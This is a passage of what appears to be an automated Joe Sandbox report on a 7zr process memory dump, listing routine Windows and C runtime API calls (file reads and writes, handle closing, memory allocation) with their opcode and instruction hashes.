                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 86af4cf44c509b970dd8437d85c21bcb8ff46efbb01e04bd0ad876ae241dd7be
                                        • Instruction ID: 241cbd0f0ed94c2c46295ecaff1a3c990627690a150d27e999eb9a40d21be50e
                                        • Opcode Fuzzy Hash: 86af4cf44c509b970dd8437d85c21bcb8ff46efbb01e04bd0ad876ae241dd7be
                                        • Instruction Fuzzy Hash: 7DE0E575600209FBCB11CFA5D801B8E7BB9AB0A765F20C06AF9199A260D7399A50DF54
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EBE6E
                                          • Part of subcall function 005E5E2B: __EH_prolog.LIBCMT ref: 005E5E30
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 36033453c9feba33f7e703414cd069c0a6508194f2d7f04a1672233236090a00
                                        • Instruction ID: 5addbefc1a8eb5b1fb17ead1595d74d60f2251f5159d9bb7af113b8a6ca9bdd9
                                        • Opcode Fuzzy Hash: 36033453c9feba33f7e703414cd069c0a6508194f2d7f04a1672233236090a00
                                        • Instruction Fuzzy Hash: 10E09B719249A08BD315EB24C0197DDBBA8BF40304F00845EE0D6D3182DFB45A04C795
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID:
                                        • API String ID: 1795875747-0
                                        • Opcode ID: 3ac260b762cfdd285a4194f31284226d2c920caaa2022ccf1cfa3f5d0f032eb9
                                        • Instruction ID: 60c334bd3a62b8ed6ba3f01a0cce314bbf074100401a3845824fe7e0272526f5
                                        • Opcode Fuzzy Hash: 3ac260b762cfdd285a4194f31284226d2c920caaa2022ccf1cfa3f5d0f032eb9
                                        • Instruction Fuzzy Hash: D9D01232504119ABCF156B94DC05CDD7BBDFF09214B00441AF541E2151EA75E5148794
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DF74A
                                          • Part of subcall function 005DF784: __EH_prolog.LIBCMT ref: 005DF789
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: fe8500514d84aca70c11d905fcd0e8a5ff56e64909b8b661ab3d4b63cd792f5c
                                        • Instruction ID: 87be3a5e23fa8764bb1d1441fd7841f3c80a3037c1e676c19caef70b0af7fcf5
                                        • Opcode Fuzzy Hash: fe8500514d84aca70c11d905fcd0e8a5ff56e64909b8b661ab3d4b63cd792f5c
                                        • Instruction Fuzzy Hash: A5D012B1E10204BFD7149F49D816BEEBB78EF44754F10052FF00161241C3B55A008AA5
                                        APIs
                                        • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,005A785F,00000000,00004000,00000000,00000002,?,?,?), ref: 005A7B65
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: d044f2c31cb3cee4c02703ed17ec1827f1176a7e629e4ee54d74f3ce767ddfe7
                                        • Instruction ID: ec2a287fecc33566e461b5ede881a5541ce40f17403e787220941232be4cb271
                                        • Opcode Fuzzy Hash: d044f2c31cb3cee4c02703ed17ec1827f1176a7e629e4ee54d74f3ce767ddfe7
                                        • Instruction Fuzzy Hash: 31E0EC75201208FBDF01CF90CC01F8E7BBAAB49754F208058E90596260C375AA54EB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F80AF
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                          • Part of subcall function 005EBDB5: __EH_prolog.LIBCMT ref: 005EBDBA
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: f0d7ea4183e506cb0054635e8789c873ce164f9278fbdfa21770fdc171c1a47d
                                        • Instruction ID: 9f6cf3b85264043894b1a704c0ed3697e7333908ba606eb8c4a5a0cc90a356ac
                                        • Opcode Fuzzy Hash: f0d7ea4183e506cb0054635e8789c873ce164f9278fbdfa21770fdc171c1a47d
                                        • Instruction Fuzzy Hash: 3AD05E71F41506AFDB4CEFB4982A76FBAE6BB84340F00457DA016E3781EF748A008664
                                        APIs
                                        • FindClose.KERNELBASE(00000000,?,005A6880), ref: 005A6853
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: b462bd38ad070e671c1ce815566fb0b357a2c514953a5ac343d015a6233ac0b0
                                        • Instruction ID: 386ad67cb486c2a9c5b00da4a4d2ebda8bf1456a0d84d807378815298af3e22c
                                        • Opcode Fuzzy Hash: b462bd38ad070e671c1ce815566fb0b357a2c514953a5ac343d015a6233ac0b0
                                        • Instruction Fuzzy Hash: 4CD0123510422246CB645E3D78449C937DD7E077343251759F0B0C31E2E7648C835650
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID:
                                        • API String ID: 1795875747-0
                                        • Opcode ID: 84e49a4959018fda5425faf04c885e411446097026268a66594bc81096a2f2d4
                                        • Instruction ID: b4465fe721c7f407cc3cbfbd7790ec8a98a23b7de9e40f26179037729b27d6f2
                                        • Opcode Fuzzy Hash: 84e49a4959018fda5425faf04c885e411446097026268a66594bc81096a2f2d4
                                        • Instruction Fuzzy Hash: 7FD0C7360082519FD7555F05EC09C8BBFA5FFD5330711081FF440521605B625815DA60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputc
                                        • String ID:
                                        • API String ID: 1992160199-0
                                        • Opcode ID: fb35090268d78567ac8a348ad7bae15cfc58848f00b52ca6040341658969e53b
                                        • Instruction ID: 69221636e8e06e0005507930babf564d2cd618e0c68823a5b5ec4a1339201973
                                        • Opcode Fuzzy Hash: fb35090268d78567ac8a348ad7bae15cfc58848f00b52ca6040341658969e53b
                                        • Instruction Fuzzy Hash: 47B092323092209BE7581A9CBC0AAC06795DB0A732B21005BF544C22909A911C818A95
                                        APIs
                                        • SetFileTime.KERNELBASE(?,?,?,?,005A7C65,00000000,00000000,?,005AF238,?,?,?,?), ref: 005A7C49
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: ab09a1ba9efafec8d867db31b384a74ab825fe0e5f6f701b96276d0082c976dd
                                        • Instruction ID: f9a2b449ef07e6fdd86e09067e2eb5b71c97b9f14533a8818442bfd0d0aa2f68
                                        • Opcode Fuzzy Hash: ab09a1ba9efafec8d867db31b384a74ab825fe0e5f6f701b96276d0082c976dd
                                        • Instruction Fuzzy Hash: 40C04C3A159105FFCF020F70CC04C1ABBA2ABA6721F10D918F159C5471C7328034EB02
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,005A7D81,?,?,?), ref: 005A7D3E
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: 83f6157cdaa3a2dc85f50374e3f64f0e5b67fbf6c880ce47b914c2b3488752fc
                                        • Instruction ID: d1300fb67d43e9d63326fa79ca75673aaa809cf76248dc639f176b5627d0c669
                                        • Opcode Fuzzy Hash: 83f6157cdaa3a2dc85f50374e3f64f0e5b67fbf6c880ce47b914c2b3488752fc
                                        • Instruction Fuzzy Hash: 9BA001742A611A8A8F512B74D8098243AA2AA5361676026A4A002CA5B5DA224419AA01
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memmove
                                        • String ID:
                                        • API String ID: 2162964266-0
                                        • Opcode ID: f9a9da92da83748cfe3c011e47ed75ac2be0701af2f343eac6a09e73a4cba9f0
                                        • Instruction ID: 0b8db74abea4827102254410856ca17ee4b355e12a97c8e33d420e51568d54d5
                                        • Opcode Fuzzy Hash: f9a9da92da83748cfe3c011e47ed75ac2be0701af2f343eac6a09e73a4cba9f0
                                        • Instruction Fuzzy Hash: FF811875E04249AFDF14CFA8C584AAEBFB1FF4A304F14846AE512A7241D771AA84CB64
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000000,005B3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3E12
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: e6aedda1f23491f8b40c2ecae890fac33056f84ebfb9897a16ad49555ead18c8
                                        • Instruction ID: 537b4aac38ba88b5f7b3e23746fd99ac47c647457c0e09aee16f7b9e42547cb2
                                        • Opcode Fuzzy Hash: e6aedda1f23491f8b40c2ecae890fac33056f84ebfb9897a16ad49555ead18c8
                                        • Instruction Fuzzy Hash: AAD0123151521147DB705E2DFC047D167DD7F11325B15445AF880DB240E764DCD25A50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                        • Instruction ID: 41355c163182d0a9a8239571ff9b53fb2755c99ea78676e84b1ec08ab750ae6b
                                        • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                        • Instruction Fuzzy Hash: 4CD0C771612A1509DF884630984965A21961F51317F1845BCB813CA2D1E715C6299758
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,?,005A75AF,00000002,?,00000000,00000000), ref: 005A7657
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5bde992c00452e70eb9ae12afac54c0aefc65746b2e1ac791532a3d4b311049d
                                        • Instruction ID: ef60a96506ad67847d94e29c827588bcc1095bf16a8feca4c7259e7f656e2287
                                        • Opcode Fuzzy Hash: 5bde992c00452e70eb9ae12afac54c0aefc65746b2e1ac791532a3d4b311049d
                                        • Instruction Fuzzy Hash: 6DD0123110962246CA681E3C7C45AC637D96A173343651759F0B0C32E1D3608C834654
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 00626B31
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: d42e3d43070c35cd81719e43bda28741b3b7857a0f84c0e212c77c3271ff818b
                                        • Instruction ID: e59ec987908d1ee617a7cdb2f4c2ed267d91c675c6fad61f4267c51f6b961cd9
                                        • Opcode Fuzzy Hash: d42e3d43070c35cd81719e43bda28741b3b7857a0f84c0e212c77c3271ff818b
                                        • Instruction Fuzzy Hash: 72C02BE1A4E290DFDF0253108C407603F318F83700F0A10C1E4045B0D3C2051C0CC723
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                        • Instruction ID: cc456f8ff6f94ea6d4b47b113a9fd96e0d0f10c81ddd46426a1bd32a3331fcbd
                                        • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                        • Instruction Fuzzy Hash: A3A024D5D1115101DDDC33303C0545710431750307FC004FC7401C0311FF17C104504D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                        • Instruction ID: ee2bfcc0925ec892e6e9731a3e4e3becfd881e7e8b0e0a54a349f84ec82ce4e5
                                        • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                        • Instruction Fuzzy Hash: A0A012CCE0010001DD8411343805453105326E0605FD4C478780040215FA15C0042146
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00626BAC
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 494ea9aa65209cdaa1bb9180c7e1fc71372914c2c4ec0b35134dbaa7981c94ba
                                        • Instruction ID: 03164c2c35c652c23315be7a63d492d8eb5e253bd28a1a20a3aa5d1616d4101b
                                        • Opcode Fuzzy Hash: 494ea9aa65209cdaa1bb9180c7e1fc71372914c2c4ec0b35134dbaa7981c94ba
                                        • Instruction Fuzzy Hash: 09A0027C681700B7EEA0AB306D4FF5937257781F15F3095447241691D05AE570449A5C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                        • Instruction ID: 8e70af0b81f727eb29e6e485e6268694df4619cb26c5e073408971f54a3dbf9d
                                        • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                        • Instruction ID: 3b09fbcf29a549fa13999d226738dc5f54572a7a0348736788d1109fadccc7a6
                                        • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: a0f929106ff90b446873e7d905551dc896533e45bd30a64399273725b730a101
                                        • Instruction ID: c8438930c1c49757cef8ab3641619ba08827a4e67cbeaa8124d91d45d123b7f0
                                        • Opcode Fuzzy Hash: a0f929106ff90b446873e7d905551dc896533e45bd30a64399273725b730a101
                                        • Instruction Fuzzy Hash: 77A00275506101DFDB451B10ED094897B63EB86637B215459F057515718B314860BA01
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
